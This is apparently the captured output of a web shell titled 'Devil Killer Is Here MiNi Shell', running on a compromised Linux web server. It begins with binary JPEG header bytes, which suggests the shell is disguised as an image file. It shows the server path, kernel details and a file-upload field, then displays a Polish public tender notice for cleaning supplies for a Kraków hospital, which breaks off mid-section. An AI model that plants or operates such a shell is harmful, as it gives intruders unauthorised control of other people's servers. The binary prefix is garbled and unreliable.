JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240726/0043234101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy środków i sprzętu do utrzymania czystości - ZP-26/24 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Kliniczny im. dr. J. Babińskiego SPZOZ w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000298554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">dr. Józefa Babińskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-393</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@babinski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.babinski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy środków i sprzętu do utrzymania czystości - ZP-26/24 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b642ae1-4443-4ad9-ad8b-1176c6d9837f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00432341</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00561717/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.16 Dostawy środków i sprzętu do utrzymania czystości</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szpital_babinski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital_babinski <br/>2. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. <br/>3. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej w zakładce „Regulamin&#34; oraz uznaje go za wiążący, b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na stronie internetowej. <br/>4. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje <br/>5. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z 09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg). b) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z<br/>6. Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do Zamawiającego”, nie za pośrednictwem adresu email. <br/>7. Wykonawca ofertę oraz przedmiotowe środki dowodowe (jeżeli są wymagane w SWZ) składa pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital_babinski na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-26/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania są sukcesywne dostawy środków i sprzętu do utrzymania czystości dla Szpitala Klinicznego im. dr. J. Babińskiego SPZOZ w Krakowie oraz nieodpłatne użyczenie dozowników, zgodnie z Asortymentem określonym dla Pakietu I. <br/>2.	Przedmiot zamówienia realizowany będzie w Asortymencie jakościowym i ilościowym określonym w Formularzu cenowym - Pakiet I – Mydła (załącznik nr 1.1 do SWZ)<br/>3.	Przedmiot zamówienia realizowany będzie zgodnie z wymaganiami Zamawiającego określonymi we wzorze umowy – załączniku nr 4 do SWZ, w tym między innymi: <br/>- Wykonawca realizował będzie dostawy wraz z wniesieniem oraz rozładunkiem Asortymentu w Magazynie Głównym Zamawiającego w Krakowie przy ul. dr. J. Babińskiego 29 oraz bezpośrednio w jednostkach organizacyjnych Zamawiającego, wskazanych w załączniku nr 12 do SWZ.<br/>- Wykonawca dostarczał będzie zamówiony Asortyment na podstawie zamówień cząstkowych składanych przez Zamawiającego, z częstotliwością raz na miesiąc kalendarzowy, z tym zastrzeżeniem, że w przypadku wystąpienia zwiększonych potrzeb Zamawiającego, Wykonawca dostarczy zamówiony Asortyment z większą częstotliwością niż jeden raz na miesiąc kalendarzowy (ilość dostaw w ciągu miesiąca kalendarzowego nie powinna przekroczyć trzech dostaw).<br/>- Wykonawca będzie realizował każdą dostawę cząstkową w terminie 4 dni roboczych, licząc od dnia przesłania zamówienia cząstkowego przez Zamawiającego.<br/>- Wykonawca realizował będzie dostawy Asortymentu z należytą starannością i zgodnie z warunkami umowy. Dostarczany Asortyment będzie wolny od wad, dopuszczony do obrotu, dobrej jakości i zgodny z obowiązującymi normami jakościowymi oraz wymaganiami Zamawiającego, fabrycznie nowy i pochodzący z bieżącej produkcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33711900-6 - Mydło</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania są sukcesywne dostawy środków i sprzętu do utrzymania czystości dla Szpitala Klinicznego im. dr. J. Babińskiego SPZOZ w Krakowie oraz nieodpłatne użyczenie systemów dozownikowych, zgodnie z Asortymentem określonym dla Pakietu II. <br/>2.	Przedmiot zamówienia realizowany będzie w Asortymencie jakościowym i ilościowym określonym w Formularzu cenowym - Pakiet II - Chemia profesjonalna (załącznik nr 1.2 do SWZ)<br/>3.	Przedmiot zamówienia realizowany będzie zgodnie z wymaganiami Zamawiającego określonymi we wzorze umowy – załączniku nr 5 do SWZ, w tym między innymi: <br/>- Wykonawca realizował będzie dostawy wraz z wniesieniem oraz rozładunkiem Asortymentu w Magazynie Głównym Zamawiającego w Krakowie przy ul. dr. J. Babińskiego 29 oraz bezpośrednio w jednostkach organizacyjnych Zamawiającego, wskazanych w załączniku nr 12 do SWZ.<br/>- Wykonawca dostarczał będzie zamówiony Asortyment na podstawie zamówień cząstkowych składanych przez Zamawiającego, z częstotliwością raz na miesiąc kalendarzowy, z tym zastrzeżeniem, że w przypadku wystąpienia zwiększonych potrzeb Zamawiającego, Wykonawca dostarczy zamówiony Asortyment z większą częstotliwością niż jeden raz na miesiąc kalendarzowy (ilość dostaw w ciągu miesiąca kalendarzowego nie powinna przekroczyć trzech dostaw).<br/>- Wykonawca będzie realizował każdą dostawę cząstkową w terminie 4 dni roboczych, licząc od dnia przesłania zamówienia cząstkowego przez Zamawiającego.<br/>- Wykonawca realizował będzie dostawy Asortymentu z należytą starannością i zgodnie z warunkami umowy. Dostarczany Asortyment będzie wolny od wad, dopuszczony do obrotu, dobrej jakości i zgodny z obowiązującymi normami jakościowymi oraz wymaganiami Zamawiającego, fabrycznie nowy i pochodzący z bieżącej produkcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24000000-4 - Produkty chemiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania są sukcesywne dostawy środków i sprzętu do utrzymania czystości dla Szpitala Klinicznego im. dr. J. Babińskiego SPZOZ w Krakowie oraz nieodpłatne użyczenie dozowników wraz z przeprowadzeniem szkoleń z ich używania, zgodnie z Asortymentem określonym dla Pakietu III. <br/>2.	Przedmiot zamówienia realizowany będzie w Asortymencie jakościowym i ilościowym określonym w Formularzu cenowym - Pakiet III – Środki czyszczące i polerujące (załącznik nr 1.3 do SWZ)<br/>3.	Przedmiot zamówienia realizowany będzie zgodnie z wymaganiami Zamawiającego określonymi we wzorze umowy – załączniku nr 6 do SWZ, w tym między innymi: <br/>- Wykonawca realizował będzie dostawy wraz z wniesieniem oraz rozładunkiem Asortymentu w Magazynie Głównym Zamawiającego w Krakowie przy ul. dr. J. Babińskiego 29 oraz bezpośrednio w jednostkach organizacyjnych Zamawiającego, wskazanych w załączniku nr 12 do SWZ.<br/>- Wykonawca dostarczał będzie zamówiony Asortyment na podstawie zamówień cząstkowych składanych przez Zamawiającego, z częstotliwością raz na miesiąc kalendarzowy, z tym zastrzeżeniem, że w przypadku wystąpienia zwiększonych potrzeb Zamawiającego, Wykonawca dostarczy zamówiony Asortyment z większą częstotliwością niż jeden raz na miesiąc kalendarzowy (ilość dostaw w ciągu miesiąca kalendarzowego nie powinna przekroczyć trzech dostaw).<br/>- Wykonawca będzie realizował każdą dostawę cząstkową w terminie 4 dni roboczych, licząc od dnia przesłania zamówienia cząstkowego przez Zamawiającego.<br/>- Wykonawca realizował będzie dostawy Asortymentu z należytą starannością i zgodnie z warunkami umowy. Dostarczany Asortyment będzie wolny od wad, dopuszczony do obrotu, dobrej jakości i zgodny z obowiązującymi normami jakościowymi oraz wymaganiami Zamawiającego, fabrycznie nowy i pochodzący z bieżącej produkcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39800000-0 - Środki czyszczące i polerujące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania są sukcesywne dostawy środków i sprzętu do utrzymania czystości dla Szpitala Klinicznego im. dr. J. Babińskiego SPZOZ w Krakowie oraz nieodpłatne użyczenie dozowników, zgodnie z Asortymentem określonym dla Pakietu IV. <br/>2.	Przedmiot zamówienia realizowany będzie w Asortymencie jakościowym i ilościowym określonym w Formularzu cenowym - Pakiet IV – Wyroby toaletowe (załącznik nr 1.4 do SWZ)<br/>3.	Przedmiot zamówienia realizowany będzie zgodnie z wymaganiami Zamawiającego określonymi we wzorze umowy – załączniku nr 7 do SWZ, w tym między innymi: <br/>- Wykonawca realizował będzie dostawy wraz z wniesieniem oraz rozładunkiem Asortymentu w Magazynie Głównym Zamawiającego w Krakowie przy ul. dr. J. Babińskiego 29 oraz bezpośrednio w jednostkach organizacyjnych Zamawiającego, wskazanych w załączniku nr 12 do SWZ.<br/>- Wykonawca dostarczał będzie zamówiony Asortyment na podstawie zamówień cząstkowych składanych przez Zamawiającego, z częstotliwością raz na miesiąc kalendarzowy, z tym zastrzeżeniem, że w przypadku wystąpienia zwiększonych potrzeb Zamawiającego, Wykonawca dostarczy zamówiony Asortyment z większą częstotliwością niż jeden raz na miesiąc kalendarzowy (ilość dostaw w ciągu miesiąca kalendarzowego nie powinna przekroczyć trzech dostaw).<br/>- Wykonawca będzie realizował każdą dostawę cząstkową w terminie 4 dni roboczych, licząc od dnia przesłania zamówienia cząstkowego przez Zamawiającego.<br/>- Wykonawca realizował będzie dostawy Asortymentu z należytą starannością i zgodnie z warunkami umowy. Dostarczany Asortyment będzie wolny od wad, dopuszczony do obrotu, dobrej jakości i zgodny z obowiązującymi normami jakościowymi oraz wymaganiami Zamawiającego, fabrycznie nowy i pochodzący z bieżącej produkcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33760000-5 - Papier toaletowy, chusteczki higieniczne, ręczniki do rąk i serwety</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania są sukcesywne dostawy środków i sprzętu do utrzymania czystości dla Szpitala Klinicznego im. dr. J. Babińskiego SPZOZ w Krakowie, zgodnie z Asortymentem określonym dla Pakietu V. <br/>2.	Przedmiot zamówienia realizowany będzie w Asortymencie jakościowym i ilościowym określonym w Formularzu cenowym - Pakiet V – Wyroby włókiennicze (załącznik nr 1.5 do SWZ)<br/>3.	Przedmiot zamówienia realizowany będzie zgodnie z wymaganiami Zamawiającego określonymi we wzorze umowy – załączniku nr 8 do SWZ, w tym między innymi: <br/>- Wykonawca realizował będzie dostawy wraz z wniesieniem oraz rozładunkiem Asortymentu w Magazynie Głównym Zamawiającego w Krakowie przy ul. dr. J. Babińskiego 29 oraz bezpośrednio w jednostkach organizacyjnych Zamawiającego, wskazanych w załączniku nr 12 do SWZ.<br/>- Wykonawca dostarczał będzie zamówiony Asortyment na podstawie zamówień cząstkowych składanych przez Zamawiającego, z częstotliwością raz na miesiąc kalendarzowy, z tym zastrzeżeniem, że w przypadku wystąpienia zwiększonych potrzeb Zamawiającego, Wykonawca dostarczy zamówiony Asortyment z większą częstotliwością niż jeden raz na miesiąc kalendarzowy (ilość dostaw w ciągu miesiąca kalendarzowego nie powinna przekroczyć trzech dostaw).<br/>- Wykonawca będzie realizował każdą dostawę cząstkową w 